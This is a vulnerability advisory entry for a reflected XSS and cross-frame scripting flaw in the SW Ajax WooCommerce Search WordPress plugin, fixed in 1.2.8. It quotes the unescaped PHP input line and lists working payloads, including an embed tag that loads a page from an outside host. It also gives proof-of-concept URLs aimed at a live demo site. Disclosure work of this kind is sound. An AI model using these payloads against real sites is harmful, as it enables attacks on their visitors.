WordPress Plugin Vulnerabilities
SW Ajax WooCommerce Search < 1.2.8 - Unauthenticated Reflected XSS & XFS
Description
An Unauthenticated Reflected XSS & XFS vulnerabilities were discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress. The plugin comes with a number of commercial themes such as: OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop, TopDeal, Victo, Avesa, Soaz, Binace, Houskit, Gaion, Furniki, Rozy, SecretSho, BosMarket, Siezz, HiStore, Ecomart, iMarket, NeoMarket, 9Merry, LeVogue, Floris, Alishop, KONStore, ShopyMall, DresShop, Shop4U, FurniHome, Tech8 and the vendor is releasing new versions with the updated plugin in them.
Proof of Concept
Affected sources/code: themes/default.php themes/layout1.php themes/layout2.php <div class="content-search"> <input class="autosearch-input" type="text" value="<?php echo ( ( isset( $_GET['s'] ) && $_GET['s'] ) ? ( $_GET['s'] ) : "" ); ?>" size="50" autocomplete="off" placeholder="<?php echo esc_attr__( 'Search Item...', 'sw_ajax_woocommerce_search' ); ?>" name="s"> <div class="search-append"></div> </div> [$] :: Payloads: XSS: "><script>alert(/XSS/)</script> XFS: "><embed src="https://ex-mi.ru/payload/xfsii.html"> [!] :: PoC Unauthenticated Reflected XSS: https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&search_posttype=product [!] :: PoC Unauthenticated XFS: https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product
Affects Plugins
Fixed in version 1.2.8
References
Classification
Miscellaneous
Original Researcher
Ex.Mi
Submitter
Ex.Mi
Submitter website
Verified
Yes
Timeline
Publicly Published
2020-10-30 (about 2 years ago)
Added
2020-10-30 (about 2 years ago)
Last Updated
2020-11-03 (about 2 years ago)